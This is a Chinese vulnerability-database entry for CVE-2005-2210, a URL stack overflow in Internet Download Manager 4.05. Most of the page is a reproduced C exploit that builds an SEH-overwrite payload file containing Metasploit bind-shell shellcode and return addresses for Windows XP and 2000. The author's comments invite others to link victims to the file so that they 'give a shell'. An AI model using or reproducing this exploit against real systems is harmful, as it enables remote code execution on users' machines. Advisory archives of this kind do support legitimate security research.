InternetDownloadManager URL 缓冲区溢出漏洞
漏洞ID | 1108919 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-07-06 | 更新时间 | 2005-07-11 |
CVE编号 | CVE-2005-2210 |
CNNVD-ID | CNNVD-200507-107 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
InternetDownloadManager是一款文件下载软件。InternetDownloadManager4.05版本中村子堆栈溢出漏洞。远程攻击者可通过超长URL,利用此漏洞执行任意代码。
|漏洞EXP
/*
Title : Internet Download Manager =< 4.05 universal remote overflow Exploit
bug analyse and exploit code by : c0d3r "Kaveh Razavi" [email protected]
my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt
************************************************************************
this bug is differnt from what was found in application called altnet
download manager .
if you read the code carefully you see that I left thingz for you .
well if you want to creat an html file linked to evil download offer
needed thingz are there , but in IE they are not usable cause exploit
string is bigger that IE input buffer .
I was analysing this bug and I was thinking about how to code an exploit
for this issue , then new Mozilla exploit came up ! yea the idea of saving
the exploit string into a file then copy/paste it to download manager
inpute url . there are other ways for sure . kiddies still can have fun
with this code just as I mentioned with a bit scripting in java or other
shits you can link exploit string which will be created in file exploit.txt
you can have a bad file , anyone using download manager can give a shell !
hint! : any other folder is being counted , so my suggestion is linking to
root webfolder .
sample usage shown in a 1 minute movie which can be downloaded at :
http://www.ihsteam.com/download/video/dlm.rar
************************************************************************
Exploit method : Structured Exception Handling known as SEH .
Targets : should work on all win2000 and win xp's even sp2 ,
Tested : winxp sp 1 and win2000 server sp 4
compile : ms visual c++ 6 : cl dlm.c
************************************************************************
Greetingz :
www.ihsteam.com LorD and NT , LorD always makes me happy with those
www.ihssecurity.com Nasa , berkely , stanford ,... shells :>
www.exploitdev.com yeah me and jamie are just started , u r0x jamie ,
www.metasploit.com fewer words better ones , great !
www.class101.org nice work is being done here ! class I used ur offsets :)
www.c0d3r.org my home ,nth here right now but those nice Essence words.
other Folks and friends not mentioned here .
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#define exploit "exploit.txt"
#define NOP 0x90
#define size 2519
int main(int argc,char **argv)
{
/*
char crap1[]=
"x3Cx48x45x41x44x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x43x6Fx6Ex74x65x6E"
"x74x2Dx54x79x70x65x22x20x63x6Fx6Ex74"
"x65x6Ex74x3Dx22x74x65x78x74x2Fx68x74"
"x6Dx6Cx3Bx20x63x68x61x72x73x65x74x3D"
"x69x73x6Fx2Dx38x38x35x39x2Dx31x22x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x72x65x66x72x65x73"
"x68x22x20x63x6Fx6Ex74x65x6Ex74x3Dx22"
"x33x3Bx20x55x52x4Cx3D";
char crap2[]= "x22x3E";
char crap3[]=
"x3Cx2Fx68x65x61x64x3E"
"x3Cx2Fx42x4Fx44x59x3E"
"x3Cx2Fx48x54x4Dx4Cx3E";
*/
char crap4[]= "x31x31x2E";
// metasploit shellc0de wow!!! LPORT=4444 Size=399
unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
FILE *fp;
char buffer[size];
unsigned int os;
char ppr[5];
char jmp[] = "xEBx0Cx90x90";
char winxp[] = "xB1x2CxC2x77";
char win2000[] ="x08xB0x01x78";
if(argc < 2) {
printf("n-------- Download Manager remote exploitn");
printf("-------- copyrighted by c0d3r of IHS 2005n");
printf("-------- usage : dlm.exe targetn");
printf("-------- target 1 : windows xp all service packs all languages : 0n");
printf("-------- target 2 : windows 2000 all service packs all languages : 1n");
printf("-------- eg : dlm.exe 0n");
printf("-------- out file will be exploit.txt for windows xpnn");
exit(-1) ;
}
os = (unsigned short)atoi(argv[1]);
switch(os)
{
case 0:
strcat(ppr,winxp);
break;
case 1:
strcat(ppr,win2000);
break;
default:
printf("n[-] this target doesnt exist in the listnn");
exit(-1);
}
printf("n-------- Download Manager remote exploitn");
printf("-------- copyrighted by c0d3r of IHS 2005n");
// heart of exploit
printf("-------- building overflow stringn");
memset(buffer,NOP,size);
memcpy(buffer,crap4,sizeof(crap4)-1);
memcpy(buffer+3+2077,jmp,4);
memcpy(buffer+3+2077+4,ppr,4);
memcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
/*
memcpy(buffer,crap1,sizeof(crap1)-1);
memcpy(buffer+122,crap4,sizeof(crap4)-1);
memcpy(buffer+2192,jmp,4);
memcpy(buffer+2196,ppr,4);
memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);
memcpy(buffer+2599,crap2,sizeof(crap2)-1);
memcpy(buffer+2601,crap3,sizeof(crap3)-1);
buffer[size] = 0;
*/
// EO heart of exploit
printf("-------- Done !n");
printf("-------- Creating the exploit.txt filen");
fp = fopen(exploit, "w+");
fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);
fclose(fp);
printf("-------- Done ! enjoy it !n");
return 0;
}
// milw0rm.com [2005-07-06]
|受影响的产品
Tonec Inc. Internet Download Manager 4.05
|参考资料
来源:MISC
链接:http://www.ihsteam.com/download/ihsexpl/dlm.c
来源:SECTRACK
名称:1014404
链接:http://securitytracker.com/id?1014404
相关推荐: Cisco Aironet Telnet验证存在拒绝服务漏洞
Cisco Aironet Telnet验证存在拒绝服务漏洞 漏洞ID 1204479 漏洞类型 未知 发布时间 2002-04-09 更新时间 2005-05-02 CVE编号 CVE-2002-0545 CNNVD-ID CNNVD-200207-003 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666